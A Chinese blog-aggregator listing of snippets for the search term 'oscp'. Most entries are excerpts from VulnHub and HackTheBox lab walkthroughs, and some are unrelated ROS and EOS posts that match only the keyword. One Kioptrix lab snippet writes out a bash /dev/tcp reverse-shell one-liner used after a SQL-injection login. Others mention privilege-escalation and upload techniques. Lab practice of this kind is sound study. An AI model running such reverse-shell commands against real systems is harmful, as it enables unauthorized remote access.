oscp

一次简单靶机的渗透测试

最近一直在准备OSCP的考试,于是就下载了很多的靶机做渗透的练习,目的就是为了更进一步的学习渗透并拿到靶机中的flag。先挑一个简单一点的(路过的大佬们求放过),废话不多说直接上干货。
wi1s0n·2020-08-21 01:15

Hack the box靶机 Bastion

还差四个靶机然后就准备去练oscp的lab了加油开了ssh还有smb先扫描smb发现Backups下面有一个note.txt下载下来查看系统管理员:请不要在本地传输整个备份文件,VPN到分公司的速度太慢
菜浪马废·2020-08-21 01:42

oscp——Kioptrix: Level 1.3 (#4)

0x00目标资料36链接https://www.vulnhub.com/entry/kioptrix-level-13-4,25/难度推荐4思路1端口0.5web——usershell1usershell——rootshell1.5环境搭建VMware下载下来之后是一个vmdx的文件,所以要经过处理这里新建一个虚拟机,选择其他移除原来的硬盘加载下载好的硬盘然后开机即可,这里需要注意的是,内存分配也
Bubble_zhu·2020-08-21 01:23

oscp——Kioptrix: Level 1.1 (#2)

0x00前言第三十二台机子0x01信息收集0x02Web80-webshell访问页面之后发现是一个登录页面,这种页面看起来就像是一个SQL注入,试一下万能密码成功进入后台,可以看到是一个执行ping命令的执行窗口这里反弹一下shell,这里使用bash-i>&/dev/tcp/192.168.0.111/1234>&1然后在/var/www/html目录下找到一个index文件,这里可以看道一个
Bubble_zhu·2020-08-21 01:23

oscp——hackNos: Os-Hax

0x00前言这个是第十九台机子了,不知不觉已经做了这么多东西了。最后,我们来一个现学现用DearE-Commerceprofessional;Thisletterwasspeciallyselectedtobesenttoyou.Wewillcomplywithallremovalrequests!ThismailisbeingsentincompliancewithSenatebill1621;
Bubble_zhu·2020-08-21 01:23

oscp——In Plain Sight: 1.0.1

0x00前言这个是第29台机子,难度感觉不在题目,而在脑洞和细心。0x01信息收集0x02端口ftp这里找到了一点东西,有一个文件,翻译一下0x03Web访问之后发现是一个WP的站绑定下host对wp站进行一个扫描找到一个账号但是我爆破半天没反应。之后在默认页面看到了index.htnl,注意是index.htnl看到了一张图片点击之后到了这里上传失败上传成功之后,在upload.php最下面有一
Bubble_zhu·2020-08-21 01:23

oscp——symfonos:3

0x00前言这个是练习的第6个机子。目标地址https://www.vulnhub.com/entry/symfonos-3,332/参考文章https://www.wandouip.com/t5i400700/https://cloud.tencent.com/developer/article/15238990x01实验1.信息收集1.1ip收集1.2开放端口为了防止其他端口开放,这里尝试一下
Bubble_zhu·2020-08-21 01:22

oscp——symfonos:2

0x00前言这个是练习的第5个机子。目标地址https://www.vulnhub.com/entry/symfonos-2,331/参考文章https://www.anquanke.com/post/id/182378https://blog.csdn.net/weixin_44214107/article/details/1005879360x01实验1.信息收集1.1目标ip1.2开放端口这
Bubble_zhu·2020-08-21 01:22

oscp——Kioptrix: Level 1 (#1)

www.vulnhub.com/entry/kioptrix-level-1-1,22/0x01信息收集1.IP2.端口0x02攻击1.端口这里可以看到80端口开放了OpenSSL使用nikto进行扫描(我记得oscp
Bubble_zhu·2020-08-21 01:22

oscp——symfonos:1

0x00前言这个是练习的第四个机子。目标地址https://www.vulnhub.com/entry/symfonos-1,322参考文章https://www.jianshu.com/p/4dec72be54980x01实验1.信息收集1.1目标IP1.2目标端口22,25,80,139,4452.攻击尝试2.1端口攻击尝试21端口,就算知道没用也是要爆破80端口,web服务139以及445这
Bubble_zhu·2020-08-21 01:22

oscp——Os-hackNos-2.1

0x00前言这个是第十五台机子,这个机子是做了一小部分,然后才来写文章的。E788B1E88081E5A986E5939F链接https://www.vulnhub.com/entry/hacknos-os-hacknos-21,403/0x01信息收集1.ip2.端口0x02攻击1.端口攻击端口这边暂时没有可以出发的地方2.web攻击web访问一下惯例扫目录:这里一看是一个wp的站,然后wpsc
Bubble_zhu·2020-08-21 01:22

No.19-VulnHub-WinterMute: 1 -Walkthrough渗透学习

Walkthrough**靶机地址:https://www.vulnhub.com/entry/wintermute-1,239/靶机难度:中级(CTF)靶机发布日期:2018年7月5日靶机描述:一个新的OSCP
大余xiyou·2020-08-21 01:14

No.4-VulnHub-Tr0ll:1-Walkthrough渗透学习

Walkthrough**靶机地址:https://www.vulnhub.com/entry/tr0ll-1,100/靶机难度:简单(CTF)靶机发布日期:2014年8月14日靶机描述:Tr0ll的灵感来自OSCP
大余xiyou·2020-08-21 01:43

android 显示系统初步总结

(硬件平台是exynosCPU+MALIGPU)3,名词解释UMP:unifiedmemoryprovider这是由ARM定义的一种内存管理方式,主要用在MaliGPU允许同一段内存被不同的进程空间映射
WAN8180192·2020-08-20 22:47

Kioptrix Level 1靶机检测不到IP地址 (determine ip info for eth0 failed)

这里写自定义目录标题背景介绍失败的尝试我是怎么开窍了呢背景介绍我是一枚纯小白,艰难的自学OSCP中。。。
Viv233·2020-08-20 22:15

Kioptrix Level 1

针对OSCP主要就是利用漏洞利用浏览器利用工具获取局域网中目标靶机IP扫描其开放端口22端口2.9p2版本暂无可利用漏洞80端口apacheopenssl/0.9.6b这三个都尝试利用一下47080.cgcc
社会底层中的弱智·2020-08-20 22:53

OSCP - SickOS:1.1 writeup

主机来源:www.vulnhub.com下载地址:https://download.vulnhub.com/sickos/sick0s1.1.7z用到的知识点:nikto漏扫cgi漏洞sudo-s提权发现IP安装成功后,查找此虚拟机的IP,我使用的是netdiscover地址为10.0.3.143nmapnmap-sV-p-10.0.3.143漏扫想了一下突破口肯定不是ssh,就从3128端口入手
一支神经病·2020-08-20 22:06

OSCP靶机-Kioptix Level 1

p=435类OSCP靶机-KioptixLevel1官方下载地址:Kioptrix:Level1(#1):https://www.vulnhub.com/entry/kioptrix-level-1-1,22
ETO中心·2020-08-20 21:43

OSCP靶机-Kioptix Level 2

同步发布:https://www.youi.xin/?p=4491.信息收集环境部署可参考上一篇https://www.youi.xin/?p=435通过对c段扫描发现了靶机ip,nmap扫描目标端口信息如下:PORTSTATESERVICEVERSION22/tcpopensshOpenSSH3.9p1(protocol1.99)|ssh-hostkey:|10248f:3e:8b:1e:58:
ETO中心·2020-08-20 21:43

Vulnhub系列:Kioptrix Level 2

2,为OSCP做打基础。
顽童先生·2020-08-20 21:47

Vulnhub系列:kioptrixVM3

2,为OSCP做打基础。
顽童先生·2020-08-20 21:47

Vulnhub系列:Kioptix Level 1

2,为OSCP做打基础。
顽童先生·2020-08-20 21:47

ubuntu权限问题

scp文件:/目录:Permissiondenied解决方法:先把需要移动的文件改变权限:777重新执行sudoscp-r.
yaoqsm·2020-08-20 20:36

ROS实践手册(五)RoboWare实现learning_service编程实验

ros_21_tutorials编程实现"spawn"服务请求右键点击ROS工作区下的“catkin_ws/src”,选择“新建ROS包”,输入包名称及其依赖包的名称learning_serviceroscpprospystd_msgsgeometry_msgsturt
ME-Msc-·2020-08-20 17:08

EOS 程序及工具

EOS仓库中的工具及程序:程序eosdeosceos-walletdlaunchersnapshot工具eoscpp程序eosdEOS的核心守护进程,配置插件并运行后即可启动一个EOS节点。
cenkai88·2020-08-20 07:12

Webots与ROS的联合仿真使用说明

Webots与ROS的联合仿真使用说明注:参考手册1.系统环境说明2.创建仿真环境3.编写ROS控制器3.1rospy控制器3.1.1程序解释3.1.2webots提供的rospy包的使用3.2roscpp
罗伯特祥·2020-08-20 02:34

EOS 开发笔记:帐户,合约,动作

首先,每个帐户都能发行任意数量的合约(contract),发行合约的命令为:eoscsetcontract帐户名合约wast文件合约abi文件执行合约时需要指定帐户名和动作名,不需要合约名:eoscpushmessage
panyanyany·2020-08-19 05:51

ubuntu16.04+ROS+科大讯飞+图灵AI机器人(二)

/src$catkin_init_workspace$cd~/catkin_ws/$catkin_make$cdsrc/$catkin_create_pkgxf_voicestd_msgsrospyroscpp
ROS大盗·2020-08-18 17:58

ros入门——发布者publisher的编程实现

1、功能包放到工作空间的src里面catkin_create_pkglearning_topicroscppstd_msgsgeometry_msgsturtlesim2、编译:在以下文件下添加如下两句
一只学渣男友狗·2020-08-18 16:23

ROS 使用stage进行(LaserScan)激光扫描仿真

运行以下命令:cd~/catkin_ws/srccatkin_create_pkgmy_stagestd_msgsroscppstd_msgsroscpp为依赖包在my_stage中的src中新建my_stage.cpp
ImportSUC·2020-08-18 07:03

ROS Kinectic 安装问题

可是在roscpp开发时,出现问题。第一个问题:编译时,找不到头文件,然后手动创建了头文件目录的连接到系统。然后源代码编译可以进行。第二个问题,连接库时,无法连
whereismatrix·2020-08-18 06:15

ros编写自己需要的msg(C++)

ros编写自己需要的msg1.首先,创建自己的包$cdcatkin_ws/src$catkin_create_pkgtestroscpp2新建一个msg文件夹用来存放自己编写的msg文件$roscdtest
『鸢』·2020-08-18 06:49

如何在ROS下编写自己的节点来订阅话题(C++)

catkin_ws事先建好了,路径是/home/siat/catkin_ws然后运行以下命令在src文件夹下建立test包$cd~/catkin_ws/src$catkin_create_pkgtestroscpp
张京林要加油·2020-08-18 03:27

ros::NodeHandle Class Reference--ros::NodeHandle::advertise

roscpp创建订阅、发布等等的交互publisherros::NodeHandle::advertise(conststd::string&topic,uint32_tqueue_szie,boollatct
空调菌·2020-08-18 01:10

rospy基础--001_talker_listener

我们需要创建一个功能包,catkin_create_pkgtalkerandlistenerroscpprospystd_msgs,在创建好的功能包的src文件夹下写入代码,代码包。
熊大,等等我...·2020-08-18 01:01

ROS基础 发布者和订阅者

订阅者通过订阅得到数据并执行操作发布者的数据结构为twist,订阅者为pose实现发布者创建话题功能包$cd~/catkin_ws/src$catkin_create_pkglearning_topicroscpprospystd_msgsgeometry_msgsturtlesim
Jason 20·2020-08-17 23:16

ros程序包下的package.xml是干什么的?

ros下创建一个名位beginner_tutorials的软件包:$cd~/catkin_ws/src$catkin_create_pkgbeginner_tutorialsstd_msgsrospyroscpp
单应矩阵·2020-08-17 23:35

(十一)在ROS上发布点云 PointClouds

1.创建工程mkdir-ppointcloud/srccdsrccatkin_create_pkgpointcloudroscpprospysensor_msgsstd_msgscd..catkin_make2
沧海飞帆·2020-08-17 23:34

ROS机器人操作系统中级教程 1

大多数客户端API的使用教程可以在相关功能包如roscpp、rospy、roslisp中找到。
oxuzhenyi·2020-08-17 18:26

ROS下编写及使用一个简单的Plugin

pluginlib/Tutorials/Writing%20and%20Using%20a%20Simple%20Plugin1.创建一个cmake空间,在该空间下创建一个包Plugin1,依赖包pluginlibroscpp
chengkuang5415·2020-08-17 18:44

OSCP - Broken writeup

主机来源:www.vulnhub.com下载地址:https://download.vulnhub.com/broken/Broken.7z用到的知识点:hex解密sudo-l提权发现IP安装成功后,查找此虚拟机的IP,我使用的是netdiscoverIP为10.0.3.147nmap80先看80端口看了一遍,只有README.md有点东西利用https://gchq.github.io/Cybe
一支神经病·2020-08-17 11:19

OSCP - SickOS:1.2 writeup

主机来源:www.vulnhub.com下载地址:https://download.vulnhub.com/sickos/sick0s1.2.zip用到的知识点:PUT上传chkrootkit提权发现IP安装成功后,查找此虚拟机的IP,我使用的是netdiscoverIP为10.0.3.144nmap没啥开的端口,从80开始,扫下目录,发现test目录,然后发现有PUT方法上传利用weevely来
一支神经病·2020-08-17 11:19

OSCP- symfonos3 writeup

主机来源:www.vulnhub.com下载地址:https://download.vulnhub.com/symfonos/symfonos3v2.7z发现IPIP为10.0.3.149nmap21和22端口看了看没有已知漏洞,我们去80先扫下目录再说先访问80端口,看到是一张图片,直接ctrl+U看一下这里貌似是提示了些什么接着访问刚才发现的gate目录,也是一张图片,也没有提示然后去看cgi
一支神经病·2020-08-17 11:19

OSCP - symfonos2 writeup

主机来源:www.vulnhub.com下载地址:https://download.vulnhub.com/symfonos/symfonos2.7z用到的知识点:SMB服务匿名访问ProFTPD1.3.5文件拷贝漏洞john解密ssh端口转发librenmsRCEmysql提权发现IP安装成功后,查找此虚拟机的IP,我使用的是netdiscovernmapSMB尝试使用SMB服务,使用anony
一支神经病·2020-08-17 11:19

OSCP - symfonos writeup

主机来源:www.vulnhub.com下载地址:https://download.vulnhub.com/symfonos/symfonos1.7z用到的知识点:SMB使用wpscan本地文件包含和写邮件getshell修改环境变量提权发现IPIP为10.0.3.150nmapSMB直接使用SMB协议,使用anonymous用户登录发现一个文件我猜有人用了这些密码还发现一个用户试一下用上面的密码
一支神经病·2020-08-17 11:19

机器人操作系统入门:三(中科大&&重德智能)

是坐标转换的标准(tf-tree)是话题(topic)是package(调试查看)是接口(roscpp/rospy)机器人部件称为link,每一个
Bluenapa·2020-08-17 11:21

Win7 Oem Tools v1.3

v1.3版本更新如下:+新增品牌东芝(TOSHIB)、东芝(TOSASU)、东芝(TOSCPL)、东芝(TOSINV)、东芝(TOSQCI);+在"支持信息"部分增加了提示;*更新Sony产品Logo;
心语家园·2020-08-16 17:07

[跟我学ROS]10.生成ROS msg文件及srv文件

文章同步链接地址为:http://www.robotos.net/thread-23-1-1.html描述:这篇教程涵盖了如何生成并编译msg和srv文件,及rosmsg,rossrv和roscp等命令工具的用法
RobotOS·2020-08-16 15:44

在ROS中使用UDP进行通信

首先你的消息发布者必须是用roscpp写的。rosp
BWBOT·2020-08-16 05:50

Ros kinetic 中自带的OpenCV使用测试

includeCMakeLists.txt改动set(OpenCV_DIR/opt/ros/kinetic/share/OpenCV-3.3.1-dev)find_package(catkinREQUIREDCOMPONENTSroscppOpenCV
好一个白·2020-08-16 04:21
上一页 3 4 5 6 7 8 9 10 下一页
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他